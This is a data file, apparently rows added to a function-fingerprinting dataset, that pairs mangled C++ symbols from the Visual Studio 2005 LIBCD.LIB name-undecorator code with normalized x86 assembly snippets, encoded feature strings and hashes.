+?getArgumentList@UnDecorator@@CA?AVDName@@XZ,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",pX9vhF7WI22OuUU4nIZROGEfGrcckERsO+MPel7WI22OuUU4NRZyE6V/b4QAAAAAYR8at0m1OKHPHEC+jrlFOF7WI216n8xVXtYjbQAAAAAAAAAASbU4oTUWchMAAAAAnIZROAoAcPD0Ke4IzxxAvkm1OKHm4Ul+s8GqPA9FqPO4onwCHJBEbF6jgycAAAAA9CnuCLPBqjwAAAAAuKJ8AmEfGrechlE4XqODJzUWchMAAAAAD0Wo817WI20AAAAAep/MVV7WI22chlE4CgBw8A9FqPO4onwC5uFJfjUWchMAAAAA,[],1744607adedffe527b499781586ec87949325e7d,VS2005,LIBCD.LIB
+?getString@pcharNode@@UBEPADPADH@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nCMP DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",nIZROJZz8F9s4A7xlnPwXzF9NgAAAAAAbOAO8TF9NgAAAAAAMX02AAAAAAAAAAAAc/0fRinZq7AAAAAAAXQ8cynZq7Bz/R9GKdmrsJZz8F+chlE4nIZROJZz8F+chlE4,[],c3e2eba7c033a05d4e004d38cc3024aee2e0dda6,VS2005,LIBCD.LIB
+?length@DName@@QBEHXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32",nIZRONUc1LbH3qEHx96hB3P9H0YAAAAAqxdJt5yGUTgAAAAASHYZLdUc1LarF0m3c/0fRpyGUTgAAAAA1RzUtgAAAAAAAAAA,[],c580ec8a4fead1378c7aa2e6537f881ec014b41b,VS2005,LIBCD.LIB
+??H@YA?AVDName@@DABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R8,BYTE PTR SS:[EBP+CONST]",EzncoAAAAAAAAAAA,Ufu7JQAAAAAAAAAAFmhznzF9NgBR+7slMX02AAAAAAAAAAAA,ceea9bf7219f67ce3c5e746a3c4ac63b0a9b5f29,VS2005,LIBCD.LIB
+?getLastChar@DName@@QBEDXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32",mzbHtV6jgyf4d/nBqxdJt5yGUTgAAAAASHYZLZyGUTirF0m3a7mkGAAAAAAAAAAA+Hf5wV6jgycAAAAAc/0fRpyGUTgAAAAA4+iOyAAAAAAAAAAAXqODJ3P9H0YAAAAAnIZROGu5pBiz9vurnIZROJyGUTibNse1s/b7q+PojsgAAAAA,[],b43cebd2da050cb736e7faab6573958f2614f056,VS2005,LIBCD.LIB
+?getDecoratedName@UnDecorator@@CA?AVDName@@XZ,"MOV R32,DWORD PTR DS:[0]\nAND R8,CONST\nMOV DWORD PTR DS:[0],R32\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",4wRdWU+LzAoAAAAAnIZROFA0OLyyN2hCsjdoQrKsdGlXCI0YVwiNGE+LzAoAAAAAUDQ4vLKsdGlXCI0Yo5zv/k+LzAoAAAAAVwiNGE+LzAoAAAAAsqx0aZyGUTiP1Jttj9SbbZyGUThcHN/Isqx0aUaK/QSP1JttLkXksk+LzAoAAAAAXBzfyJyGUThImItqj9SbbS5F5LJGiv0Eep/MVUaK/QRDO9ruRor9BAVisZQuReSyRor9BFJo6luY8X8JQzva7rKsdGlXCI0YLkXksk+LzAoAAAAAmPF/CaOc7/6chlE4SJiLalA0OLyyN2hCBWKxlE+LzAoAAAAAUmjqW6Oc7/6chlE4UVKrknqfzFXjBF1ZnIZROKOc7/5Bych4T4vMCgAAAAAAAAAAQcnIeE+LzAoAAAAA,[],e134aa5c94953258903eb50fe52d89652eb77725,VS2005,LIBCD.LIB
+?getReferenceType@UnDecorator@@CA?AVDName@@ABV2@0@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",xKjfxAAAAAAAAAAA,nwqMS48BVbqfCoxLT4vMCgAAAAAAAAAAj9SbbRu+WJx78hIAnwqMS0OSIcafCoxLdcU5X0OSIcYAAAAAyCkeyk+LzAoAAAAAjwFVusgpHsrt8aO9qwp/KJ8KjEt1xTlfnwqMS3XFOV+QsFcLe/ISADp6iI4bvlicQ5Ihxk+LzAoAAAAA7fGjvU+LzAoAAAAAj9SbbXvyEgCP1JttnwqMS58KjEuPAVW6dcU5X58KjEsAAAAAnwqMS8gpHsrt8aO9kLBXC3XFOV8AAAAAOnqIjk+LzAoAAAAAG75YnJ8KjEufCoxL79gQG6sKfyiP1Jtt,03daa3a718d79863f0be97a387164efe15467486,VS2005,LIBCD.LIB
+??BUnDecorator@@QAEPADXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST",e/ISAI/Um2327yRvzLypBplqXtUAAAAAAsmtApVCuaHMvKkGd7cx5yQDw532z31tmWpe1Xe3Mef4npmDlUK5oUaK/QRmeTE1Uvsuu0+LzAoAAAAAJAPDnVL7LrsVPd8HT4vMCgAAAAAAAAAAJAPDnSQDw532z31tRor9BJlqXtVSaOpbpCapMZlqXtUAAAAAFT3fB0+LzAoAAAAA+J6ZgyQDw50AAAAAj9SbbZVCuaECya0C9u8kb4/Um22kJqkxZnkxNU+LzAoAAAAA9s99bVL7LrsVPd8HobeMIJlqXtV78hIAmWpe1UaK/QRmeTE1UmjqW/iemYOZal7V,[],e2d85d5afe296d119170d303485edb9d750945f9,VS2005,LIBCD.LIB
+?getCallIndex@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32",wRGZPgAAAAAAAAAA,LLBVVfRmhnAAAAAAh1217U+LzAoAAAAAsqx0aY/Um21F8BWG9GaGcI/Um20AAAAARfAVhk+LzAoAAAAAj9SbbfAijlyyrHRpj9SbbcjjyjvBDajYyOPKO/AijlyyrHRpj9SbbS5F5LIssFVVT4vMCgAAAAAAAAAALkXksk+LzAoAAAAALkXksk+LzAoAAAAARfAVhk+LzAoAAAAA8CKOXIddte0uReSyGpNHI4/Um21F8BWGwQ2o2E+LzAoAAAAAj9SbbcjjyjuP1Jttj9SbbS5F5LKP1Jtt,3071b023b2bc5b8f77b4d1411489caca09c3327c,VS2005,LIBCD.LIB
+?getECSUDataType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCALL CONST\nTEST R32,R32\nJCC CONST",wZugLgAAAAAAAAAA9CnuCM2PagsAAAAAUmjqW1R3kmz0Ke4Iq5CqUU+LzAoAAAAAUVKrklR3kmxSaOpbVHeSbADLUoPBm6AuzY9qCwDLUoPBm6Au+s8yXE+LzAoAAAAAT4vMCgAAAAAAAAAAAMtSg/rPMlyrkKpR,[],a6cf490b507b0fa5478925ea933a5eda35cba4c6,VS2005,LIBCD.LIB
+??AReplicator@@QBEABVDName@@H@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",mC8l04D9In4AAAAABpQh9AAAAAAAAAAAg65DXpgvJdNKiADLgP0ifgAAAAAAAAAAvRhHkpgvJdOchlE4SogAywaUIfSYLyXTnIZROIOuQ16YLyXTmC8l04D9In4AAAAA,[],472c7a8885b94900c7589eafe97fe0657bb6e826,VS2005,LIBCD.LIB
+?getTemplateArgumentList@UnDecorator@@CA?AVDName@@XZ,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0",XqODJ2pOhBkAAAAAK3sIFCIAyZXPHEC+nIZROI/BMOU603OtOtNzrTUWchMAAAAA4y6CZ2pOhBkAAAAAO+MPel7WI21H5yNRjXqsil6jgycAAAAA9u8kb465RTjTWUbJak6EGSIAyZXPHEC+ZW854V6jgycAAAAApX9vhF7WI21H5yNRzxxAviIAyZWNVLhKR+cjUV7WI216n8xVjrlFOCt7CBTGcgnbjVS4SqV/b4QAAAAAep/MVV7WI22chlE4xnIJ22VvOeFhONFNIgDJlaV/b4QAAAAAXqODJ16jgycAAAAAZW854WpOhBkAAAAAnIZROMWUiTz0Ke4Ij8Ew5XvyEgDjLoJnNRZyE6V/b4QAAAAA9CnuCEBW9tgAAAAAXtYjbQAAAAAAAAAAxZSJPI/BMOWchlE4YTjRTWVvOeGNeqyKQFb22I/BMOWchlE4e/ISAI65RTj27yRv01lGyWpOhBkAAAAA,[],e6df7e3580037bc106f3dca4ebac82297875bd7a,VS2005,LIBCD.LIB
+?isUDTThunk@DName@@QBEHXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",9CnuCNUc1LYAAAAA1RzUtgAAAAAAAAAAfi0FCuB4J1T0Ke4I4HgnVAAAAAAAAAAAtRoLbuB4J1R+LQUK,[],bdf6e4be1d8a7972990f05b54b7153d7aee65b30,VS2005,LIBCD.LIB
+??0DName@@QAE@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]",iSUqXQAAAAAAAAAA,[],da518c417398da8df142e9d805196b0b7c2c47d5,VS2005,LIBCD.LIB
+??YDName@@QAEAAV0@PBD@Z,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",Loz+dVspziEaJ9RMYwQkZjF9NgAAAAAAli5ZUTF9NgBRXDRXnwqMSy6M/nWYu+bRBhugpTF9NgAAAAAAMX02AAAAAAAAAAAA8nQGngYboKUAAAAAmLvm0TF9NgAAAAAAGifUTGMEJGbydAaeUVw0VzF9NgCfCoxLWynOITF9NgAAAAAA,[],23656d13054fdb709383cebfddfea1d1171d54b5,VS2005,LIBCD.LIB
+?getTemplateConstant@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[0]\nADD R32,CONST",T4vMCgAAAAAAAAAABWKxlE+LzAoAAAAAcf7B6AAAAAAAAAAAPCNl6gVisZRx/sHo,[],488bd6c6a7d91aad36ad827fdd9a642dcfbdc720,VS2005,LIBCD.LIB
+?getString@DName@@QBEPADPADH@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",nIZROO772nTAae5HQY18G83lJkH4d/nBwGnuR8zaBN9BjXwbvzraWpyGUTgAAAAATuJtW8zaBN8AAAAA+Hf5wc3lJkEAAAAA7vvadF6jgycAAAAAnIZROGnNBgAZEhIanIZRODF9NgDu+9p0zeUmQczaBN9O4m1bXqODJzF9NgAAAAAAGRISGmnNBgAAAAAAQFFcVpyGUTichlE47vvadDF9NgAAAAAAnIZROO772nSchlE4ac0GAF6jgye/OtpazNoE35yGUTgAAAAAMX02AAAAAAAAAAAA,[],573a90fd380be24d5079f65f3b8f592fb826e428,VS2005,LIBCD.LIB
+??0DName@@QAE@W4DNameStatus@@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],CONST\nJCC CONST",iLc46pZz8F/ezKjMlnPwX60czcsAAAAAWynOITF9NgAAAAAArRzNyzF9NgBbKc4hnIZROIfHvCD0Ke4I3syozK0czcsAAAAA9CnuCIi3OOoAAAAAMX02AAAAAAAAAAAAh8e8IJZz8F/ezKjMY2UOaYfHvCCchlE4,[],bd85c8954f8bbb587e0dd3e839e485f41468ac4e,VS2005,LIBCD.LIB
+??H@YA?AVDName@@W4DNameStatus@@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",vXUgNgAAAAAAAAAA,MX02AAAAAAAAAAAA+Hf5wYi3OOoAAAAAY2UOafh3+cGchlE4iLc46pZz8F/ezKjMlnPwX60czcsAAAAAWynOITF9NgAAAAAArRzNyzF9NgBbKc4hnIZROPh3+cH0Ke4I3syozK0czcsAAAAA9CnuCIi3OOoAAAAA,6230d082753581ba257675a1e96afecc0100a529,VS2005,LIBCD.LIB
+?getLastChar@pcharNode@@UBEDXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",DUpr5OPojsgAAAAA4+iOyAAAAAAAAAAA3NgTIePojsgAAAAAerDzW9zYEyENSmvk,[],ec84bfad434783e1617489500d74724bab4fcc03,VS2005,LIBCD.LIB
+??HDName@@QBE?AV0@W4DNameStatus@@@Z,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV ESP,EBP\nPOP EBP\nRETN CONST",ESVRXAAAAAAAAAAABGBHCxElUVyNeqyKjXqsihsgNUwAAAAAGyA1TAAAAAAAAAAA,[],3417fe45fcf9649e6445cac2e37bd04f00e45729,VS2005,LIBCD.LIB
+??YReplicator@@QAEAAV0@ABVDName@@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",vxP/ejF9NgBI+Fl6incMmDF9NgBI+Fl6nwqMSzF9NgAaJ9RMMX02AAAAAAAAAAAASPhZegAAAAAAAAAAtRoLbjF9NgCfCoxLGifUTL8T/3rezKjM3syozIp3DJgAAAAA,[],fc9c4fb29dee60fc01803579401efe25c0bea5b2,VS2005,LIBCD.LIB
+?getDataIndirectType@UnDecorator@@CA?AVDName@@ABV2@D0H@Z,"MOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nXOR R32,R32\nCMP R32,CONST\nSETL R8\nDEC R32",P2iPElJo6ltF8BWGIyVg5VA0OLx+RkN02O2JOl6jgycAAAAAfHaII1Jo6luchlE4ac0GAGfFLJ6fCoxLnwqMSyZjW6KfCoxLeh9cZlA0OLx+RkN0nIZROAVisZSfCoxLx8uPJQ6V6UwYsdvDnwqMS58KjEufCoxLnwqMSwVisZRN1qqWnwqMS86VCi8mY1uiRfAVhk+LzAoAAAAAnwqMS2fFLJ4RehalGLHbww6V6UwAAAAAnwqMS6bEJSWfCoxLTdaqlk+LzAoAAAAAfkZDdFA0OLw1FnITJmNbok+LzAoAAAAAEXoWpWfFLJ4AAAAAjGHohmnNBgAAAAAAUDQ4vN1ksFFwIstknwqMSxieWv6mxCUll5bzj0aK/QQAAAAARor9BEaK/QRKohpw+96+dFJo6luchlE4ES2tamnNBgDZLrb5UmjqW8fLjyV6H1xmDpXpTA6V6Uz10fJHpsQlJV6jgycAAAAAXqODJ16jgycAAAAAeh9cZpyGUTheo4MnnIZROLL0GYhF8BWG9dHyRw6V6UwAAAAAz8bsr3ofXGazXP6GcCLLZOfUGbIAAAAAZ8Usnk+LzAoAAAAARfAVhk+LzAoAAAAABWKxlE+LzAoAAAAAac0GAHofXGazXP6GcCLLZIxh6IYAAAAAXqODJ0aK/QQAAAAAzpUKL0+LzAoAAAAA2S62+bNc/oYjJWDlXqODJw6V6UwAAAAAs1z+hkXwFYZpzQYAT4vMCgAAAAAAAAAAnIZROIU8lU9F8BWGUDQ4vLbRQWVwIstksvQZiEaK/QSr6SQSSqIacD9ojxIPRajzGJ5a/l6jgycAAAAARfAVhk+LzAoAAAAAq+kkEpeW84/Y7Yk6DpXpTGnNBgD10fJHRfAVhk+LzAoAAAAAac0GAEXwFYYknk1o9dHyR2nNBgAAAAAAhTyVT16jgycAAAAARor9BD9ojxIPRajz3WSwUWnNBgAAAAAAJJ5NaPvevnR8dogjac0GAJyGUThqQdtzNRZyE8/G7K8AAAAAttFBZWnNBgAAAAAAD0Wo81Jo6lsAAAAAakHbc5yGUTifCoxL59QZsmnNBgAAAAAAXqODJ2fFLJ4AAAAA,[],48c7857b46fbf2c06da3faa1be9a5529ff94f3ad,VS2005,LIBCD.LIB
+??YDName@@QAEAAV0@D@Z,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",Loz+dVspziEaJ9RMlnPwXwYboKUAAAAAfknGjwYboKUAAAAAnwqMSy6M/nUJn6AHBhugpTF9NgAAAAAAMX02AAAAAAAAAAAAYOfHQjF9NgCfCoxLCZ+gBzF9NgAAAAAAGifUTJZz8F9+ScaPWynOITF9NgAAAAAA,[],02566cee83f412342f0ad38e58b1e02e49632c4d,VS2005,LIBCD.LIB
+___unDNameEx,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",DczAAU+LzAoAAAAAT4vMCgAAAAAAAAAAVaatKGvstOkNzMABa+y06U+LzAoAAAAA,[],726adbc28fbccc7e0510baa3cdcc0ecc5b3653df,VS2005,LIBCD.LIB
+?doThisTypes@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nXOR R32,R32\nCMP R32,CONST\nSETNE R8\nMOV R32,R32",5HnhGAAAAAAAAAAA,[],c970ab25a46066bc9850d6978f241e621a80fddf,VS2005,LIBCD.LIB
+?nextNode@DNameNode@@QBEPAV1@XZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV ESP,EBP\nPOP EBP",JrAphQAAAAAAAAAA,[],724794727703c26168a45d70b223da171232f5cb,VS2005,LIBCD.LIB
+?getLastChar@pDNameNode@@UBEDXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",4+iOyAAAAAAAAAAAxTM6C+PojsgAAAAAerDzW9zYEyHFMzoL3NgTIePojsgAAAAA,[],53ab7480b6bf79724388059809e25b03cb3803d3,VS2005,LIBCD.LIB
+??0charNode@@QAE@D@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0",VqihEwAAAAAAAAAA,5Ihl/QAAAAAAAAAA,6811223a8b1f7b0b9c912dace294ec7560486ea5,VS2005,LIBCD.LIB
+?doThrowTypes@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND R32,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",DfI/3wAAAAAAAAAA,[],77e28bf32e446ec175defeeadd3572c64292c258,VS2005,LIBCD.LIB
+?getExternalDataType@UnDecorator@@CA?AVDName@@ABV2@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST",Q1HKXJZz8F/M2gTfzNoE3+NNfsIAAAAA401+wgAAAAAAAAAAlnPwX+NNfsIAAAAA,[],069e12862c30a687fab037eb57819c34f988b508,VS2005,LIBCD.LIB
+?isFull@Replicator@@QBEHXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nCMP DWORD PTR DS:[R32],CONST\nSETE R8",+EIwwQAAAAAAAAAA,[],89b8fbd1892f1430dd52dc47f84fc3ee0d41f387,VS2005,LIBCD.LIB
+?getSymbolName@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nCMP R32,CONST\nJCC CONST",A7ltY0+LzAoAAAAAxpuwYU+LzAoAAAAA080hSsabsGEDuW1jT4vMCgAAAAAAAAAA,[],d8e00ea4400fdba2af5018cd634e643314471a22,VS2005,LIBCD.LIB
+??YDNameNode@@QAEAAV0@PAV0@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",MX02AAAAAAAAAAAAKdmrsLw48ipeo4MnKdmrsE0oA0m8OPIqXqODJ00oA0kAAAAAvDjyKjF9NgAAAAAAvDjyKinZq7AAAAAAY2UOaTF9NgAp2auwTSgDSTF9NgAAAAAATSgDSSnZq7AAAAAA,[],cc7aa62ab8058f09d5b86c8cd125c84b2b1cf961,VS2005,LIBCD.LIB
+??0DNameStatusNode@@QAE@W4DNameStatus@@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],0",1FArIwAAAAAAAAAA,5Ihl/QAAAAAAAAAA,272189e39614d506b2f6e664079405f20765b8c4,VS2005,LIBCD.LIB
+?doMSKeywords@UnDecorator@@SAHXZ,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nAND CONST,CONST\nNEG R32\nSBB R32,R32\nINC R32\nPOP EBP",N1mO7AAAAAAAAAAA,[],e4d648e2379104caf66f9b3383e07689761d3421,VS2005,LIBCD.LIB
+??0pcharNode@@QAE@PBDH@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",nIZRONHTlgPs6jDaMX02AAAAAAAAAAAAq8mD8pyGUTichlE47Oow2l6jgycAAAAAT6vMHNHTlgOchlE4XqODJzF9NgAAAAAA0dOWAzF9NgAAAAAAnIZRONHTlgOchlE4nIZROJyGUThPq8wc,[],3ef207963525d4a58b35b38a8241756b469389fd,VS2005,LIBCD.LIB
+?length@pcharNode@@UBEHXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV ESP,EBP\nPOP EBP",JrAphQAAAAAAAAAA,[],33c6fba87cc1842ff3861726589ea552de099bc3,VS2005,LIBCD.LIB
+?getLastChar@DNameStatusNode@@UBEDXZ,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[CONST+CONST],CONST\nSETNE R8\nDEC R32",xSWNUQAAAAAAAAAA,[],b404b577d0b6433387e8ecef811178188cb8469e,VS2005,LIBCD.LIB
+?clone@DNameNode@@QAEPAV1@XZ,"PUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",1RzUtgAAAAAAAAAAlnPwX97MqMwAAAAA3syozNUc1LYAAAAA3syozN7MqMwAAAAAXnhyCpZz8F8aJ9RMGifUTJZz8F/ezKjMlnPwX9Uc1LYAAAAA,[],d593930559051f4ca3c637826788e7e5ca13c099,VS2005,LIBCD.LIB
+?isValid@DName@@QBEHXZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nTEST R32,R32\nJCC CONST",tRoLbpZz8F9WVOoi1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAAVlTqIpZz8F/0Ke4I9CnuCNUc1LYAAAAA,[],55d51fb3fd5b51b075d4a45fcde9095234c5c7fc,VS2005,LIBCD.LIB
+?getString@pDNameNode@@UBEPADPADH@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+CONST],0\nJCC CONST",MX02AAAAAAAAAAAAshGaPzF9NgAAAAAAerDzW5Zz8F+chlE4nIZROJZz8F+chlE4lnPwXzF9NgAAAAAAnIZROJZz8F+yEZo/,[],2979b84e0f829aa383ed1966985987cadf100c87,VS2005,LIBCD.LIB
+?Constructor@HeapManager@@QAEXP6APAXI@ZP6AXPAX@Z@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",AnfUBgAAAAAAAAAA,[],dcfe4b962321b105ba61d3a85af8967910171376,VS2005,LIBCD.LIB
+?getGuardNumber@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPUSH R32",wRGZPgAAAAAAAAAA,h1217U+LzAoAAAAAj9SbbS5F5LKP1Jttsqx0aY/Um21F8BWG9GaGcI/Um20AAAAALkXksk+LzAoAAAAAj9SbbcjjyjvBDajYRfAVhk+LzAoAAAAAyOPKO/AijlyyrHRpj9SbbS5F5LIssFVVT4vMCgAAAAAAAAAALkXksk+LzAoAAAAA8CKOXIddte0uReSyGpNHI4/Um21F8BWGj9SbbfAijlyyrHRpRfAVhk+LzAoAAAAAj9SbbcjjyjuP1JttLLBVVfRmhnAAAAAAwQ2o2E+LzAoAAAAA,3071b023b2bc5b8f77b4d1411489caca09c3327c,VS2005,LIBCD.LIB
+?doPchar@DName@@AAEXPBDH@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nCMP R32,CONST\nJCC CONST",GifUTJZz8F9TSKWliQ86P4D9In6jH70alnPwXxcwS5cAAAAAFzBLl16jgydbKc4hU0ilpRcwS5cAAAAAox+9GoD9In6DrkNeWynOIV6jgycAAAAAg65DXmnNBgBxMROclnPwXxcwS5cAAAAAXqODJ4D9In4AAAAAWynOIYD9In4AAAAAFzBLl16jgydbKc4hWynOIV6jgycAAAAAac0GAFspziFpzQYAgP0ifgAAAAAAAAAAac0GAFspziGKdwyYXqODJ16jgycAAAAAincMmDLMWuSchlE4GifUTJZz8F+XCllFnIZROBon1Exeo4MncTETnID9In4AAAAAXqODJxon1EwAAAAAMsxa5F6jgycAAAAAlwpZRRcwS5cAAAAA,[],fc4b3301089c512af2e552f675e98923e798c278,VS2005,LIBCD.LIB
